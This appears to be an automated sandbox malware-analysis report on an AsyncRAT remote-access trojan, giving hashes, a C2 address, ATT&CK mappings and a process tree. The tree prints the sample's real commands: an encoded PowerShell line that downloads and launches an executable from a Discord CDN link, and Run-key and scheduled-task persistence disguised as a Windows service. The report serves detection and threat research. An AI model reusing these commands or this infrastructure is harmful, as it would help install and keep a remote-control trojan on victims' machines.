asyncrat | e1178760d7690fdba91528ff2053a646c84774a721fa554fc94130bd50375ac0

General

Target

rtyrryr.exe
Size

6KB
MD5

f853ede612b21de687500cd9892c37ad
SHA1

fbb1e62b890b50f1ab552cefb6a7b24db875fbb6
SHA256

e1178760d7690fdba91528ff2053a646c84774a721fa554fc94130bd50375ac0
SHA512

4de3e875a111cd90eda4c59d554d8eb4001d18e1f2fde173ba74f24a78decbe74e5327654bf30693943bc224f81c728686cd4c2650f36ed8ae47d60a0211c42b
SSDEEP

96:9xr79BTaCF5NTcM4tweWvk+PneJtNNtUqGsukdNx2d3oj+rl:9xX9FBFDT4qJvkwnEfNtUqGsukR2dZ

Score

10^/10

asyncrat defendersmartscren persistence rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

C2

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes

delay
3
install
false
install_file
SecurityHealtheurvice.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4616-152-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

46 3976 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

tryrtytryrty.exe

pid process

1780 tryrtytryrty.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

rtyrryr.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation rtyrryr.exe

flow	pid	process
46	3976	powershell.exe

pid	process
1780	tryrtytryrty.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	rtyrryr.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe"	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

tryrtytryrty.exe

description pid process target process

PID 1780 set thread context of 4616 1780 tryrtytryrty.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3368 schtasks.exe

description	pid	process	target process
PID 1780 set thread context of 4616	1780	tryrtytryrty.exe	RegAsm.exe

pid	process
3368	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exetryrtytryrty.exepowershell.exe

pid	process
3976	powershell.exe
3976	powershell.exe
1780	tryrtytryrty.exe
1780	tryrtytryrty.exe
1780	tryrtytryrty.exe
1780	tryrtytryrty.exe
3560	powershell.exe
3560	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exetryrtytryrty.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3976 powershell.exe
Token: SeDebugPrivilege 1780 tryrtytryrty.exe
Token: SeDebugPrivilege 3560 powershell.exe

description	pid	process
Token: SeDebugPrivilege	3976	powershell.exe
Token: SeDebugPrivilege	1780	tryrtytryrty.exe
Token: SeDebugPrivilege	3560	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

rtyrryr.exepowershell.exetryrtytryrty.execmd.exe

description	pid	process	target process
PID 2140 wrote to memory of 3976	2140	rtyrryr.exe	powershell.exe
PID 2140 wrote to memory of 3976	2140	rtyrryr.exe	powershell.exe
PID 3976 wrote to memory of 1780	3976	powershell.exe	tryrtytryrty.exe
PID 3976 wrote to memory of 1780	3976	powershell.exe	tryrtytryrty.exe
PID 3976 wrote to memory of 1780	3976	powershell.exe	tryrtytryrty.exe
PID 1780 wrote to memory of 3560	1780	tryrtytryrty.exe	powershell.exe
PID 1780 wrote to memory of 3560	1780	tryrtytryrty.exe	powershell.exe
PID 1780 wrote to memory of 3560	1780	tryrtytryrty.exe	powershell.exe
PID 1780 wrote to memory of 744	1780	tryrtytryrty.exe	cmd.exe
PID 1780 wrote to memory of 744	1780	tryrtytryrty.exe	cmd.exe
PID 1780 wrote to memory of 744	1780	tryrtytryrty.exe	cmd.exe
PID 744 wrote to memory of 3368	744	cmd.exe	schtasks.exe
PID 744 wrote to memory of 3368	744	cmd.exe	schtasks.exe
PID 744 wrote to memory of 3368	744	cmd.exe	schtasks.exe
PID 1780 wrote to memory of 2204	1780	tryrtytryrty.exe	RegAsm.exe
PID 1780 wrote to memory of 2204	1780	tryrtytryrty.exe	RegAsm.exe
PID 1780 wrote to memory of 2204	1780	tryrtytryrty.exe	RegAsm.exe
PID 1780 wrote to memory of 2436	1780	tryrtytryrty.exe	RegAsm.exe
PID 1780 wrote to memory of 2436	1780	tryrtytryrty.exe	RegAsm.exe
PID 1780 wrote to memory of 2436	1780	tryrtytryrty.exe	RegAsm.exe
PID 1780 wrote to memory of 4616	1780	tryrtytryrty.exe	RegAsm.exe
PID 1780 wrote to memory of 4616	1780	tryrtytryrty.exe	RegAsm.exe
PID 1780 wrote to memory of 4616	1780	tryrtytryrty.exe	RegAsm.exe
PID 1780 wrote to memory of 4616	1780	tryrtytryrty.exe	RegAsm.exe
PID 1780 wrote to memory of 4616	1780	tryrtytryrty.exe	RegAsm.exe
PID 1780 wrote to memory of 4616	1780	tryrtytryrty.exe	RegAsm.exe
PID 1780 wrote to memory of 4616	1780	tryrtytryrty.exe	RegAsm.exe
PID 1780 wrote to memory of 4616	1780	tryrtytryrty.exe	RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\rtyrryr.exe
"C:\Users\Admin\AppData\Local\Temp\rtyrryr.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAbgBiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADUANAA4ADQANwA3ADEAOQA0ADQANAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGoAcABmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgB0AHAAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBkAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAByAHkAcgB0AHkAdAByAHkAcgB0AHkALgBlAHgAZQAnACkAKQA8ACMAZQBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBmAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG0AbQBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHQAcgB5AHIAdAB5AHQAcgB5AHIAdAB5AC4AZQB4AGUAJwApADwAIwBiAHcAdgAjAD4A"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3976

C:\Users\Admin\AppData\Roaming\tryrtytryrty.exe
"C:\Users\Admin\AppData\Roaming\tryrtytryrty.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3560

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
4⤵
- Suspicious use of WriteProcessMemory
PID:744

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
5⤵
- Creates scheduled task(s)
PID:3368

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
4⤵
PID:2204

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
4⤵
PID:2436

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
4⤵
PID:4616

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
00e58f368649eca5caa1a16e72386a57

SHA1
1c5e0dc46d6bba4ddd8e3ce4e2aca83950434635

SHA256
c4c309d45ade44494c6f586774623c99621a7cda17a743aa0ba82a23850ccba7

SHA512
37bcc4171624838457d146b21157eb2771d94637a3b89f57ab2fcf9be10baff16ef9fc97cf77fb6bf9490806561be5c36c3ab52553cd57d9d872d26e89defaa0

Download Submit
C:\Users\Admin\AppData\Roaming\tryrtytryrty.exe
Filesize
87KB

MD5
ca699117112a173ca7b289f1baf6c3c0

SHA1
862f227d4fa0b4de892006d7fe19e610e9f1a676

SHA256
db805d5ac09ea9d18a3016d4c70cbb52087604fe5ad23fd8043399c970c0c8a6

SHA512
d9f82f6e18ce2eb624a5ee1e20618318fde7ffdcff834d9c0291f4971bd72ce9b7f5108bf45f11ceed4d1f526bad4842913e833a25e3d99a3235d6f87b4d2620

Download Submit
C:\Users\Admin\AppData\Roaming\tryrtytryrty.exe
Filesize
87KB

MD5
ca699117112a173ca7b289f1baf6c3c0

SHA1
862f227d4fa0b4de892006d7fe19e610e9f1a676

SHA256
db805d5ac09ea9d18a3016d4c70cbb52087604fe5ad23fd8043399c970c0c8a6

SHA512
d9f82f6e18ce2eb624a5ee1e20618318fde7ffdcff834d9c0291f4971bd72ce9b7f5108bf45f11ceed4d1f526bad4842913e833a25e3d99a3235d6f87b4d2620

Download Submit
memory/744-145-0x0000000000000000-mapping.dmp

Download
memory/1780-138-0x0000000000000000-mapping.dmp

Download
memory/1780-142-0x0000000000040000-0x000000000005C000-memory.dmp

Filesize
112KB

Download
memory/1780-143-0x0000000004D60000-0x0000000005304000-memory.dmp

Filesize
5.6MB

Download
memory/2140-132-0x00000000005D0000-0x00000000005D8000-memory.dmp

Filesize
32KB

Download
memory/2140-135-0x00007FFBC8BD0000-0x00007FFBC9691000-memory.dmp

Filesize
10.8MB

Download
memory/2204-148-0x0000000000000000-mapping.dmp

Download
memory/2436-149-0x0000000000000000-mapping.dmp

Download
memory/3368-146-0x0000000000000000-mapping.dmp

Download
memory/3560-159-0x0000000072CE0000-0x0000000072D2C000-memory.dmp

Filesize
304KB

Download
memory/3560-163-0x00000000078E0000-0x00000000078EA000-memory.dmp

Filesize
40KB

Download
memory/3560-168-0x0000000007BD0000-0x0000000007BF2000-memory.dmp

Filesize
136KB

Download
memory/3560-147-0x0000000002BB0000-0x0000000002BE6000-memory.dmp

Filesize
216KB

Download
memory/3560-167-0x0000000007B90000-0x0000000007B98000-memory.dmp

Filesize
32KB

Download
memory/3560-150-0x0000000005670000-0x0000000005C98000-memory.dmp

Filesize
6.2MB

Download
memory/3560-166-0x0000000007BB0000-0x0000000007BCA000-memory.dmp

Filesize
104KB

Download
memory/3560-165-0x0000000007AA0000-0x0000000007AAE000-memory.dmp

Filesize
56KB

Download
memory/3560-164-0x0000000007AF0000-0x0000000007B86000-memory.dmp

Filesize
600KB

Download
memory/3560-153-0x0000000005250000-0x0000000005272000-memory.dmp

Filesize
136KB

Download
memory/3560-154-0x0000000005E90000-0x0000000005EF6000-memory.dmp

Filesize
408KB

Download
memory/3560-155-0x0000000005F00000-0x0000000005F66000-memory.dmp

Filesize
408KB

Download
memory/3560-144-0x0000000000000000-mapping.dmp

Download
memory/3560-157-0x0000000005E00000-0x0000000005E1E000-memory.dmp

Filesize
120KB

Download
memory/3560-158-0x0000000006A90000-0x0000000006AC2000-memory.dmp

Filesize
200KB

Download
memory/3560-162-0x0000000007870000-0x000000000788A000-memory.dmp

Filesize
104KB

Download
memory/3560-160-0x0000000006A70000-0x0000000006A8E000-memory.dmp

Filesize
120KB

Download
memory/3560-161-0x0000000007EF0000-0x000000000856A000-memory.dmp

Filesize
6.5MB

Download
memory/3976-133-0x0000000000000000-mapping.dmp

Download
memory/3976-134-0x000001B5B26E0000-0x000001B5B2702000-memory.dmp

Filesize
136KB

Download
memory/3976-136-0x00007FFBC8BD0000-0x00007FFBC9691000-memory.dmp

Filesize
10.8MB

Download
memory/3976-137-0x00007FFBC8BD0000-0x00007FFBC9691000-memory.dmp

Filesize
10.8MB

Download
memory/3976-140-0x00007FFBC8BD0000-0x00007FFBC9691000-memory.dmp

Filesize
10.8MB

Download
memory/4616-152-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4616-151-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads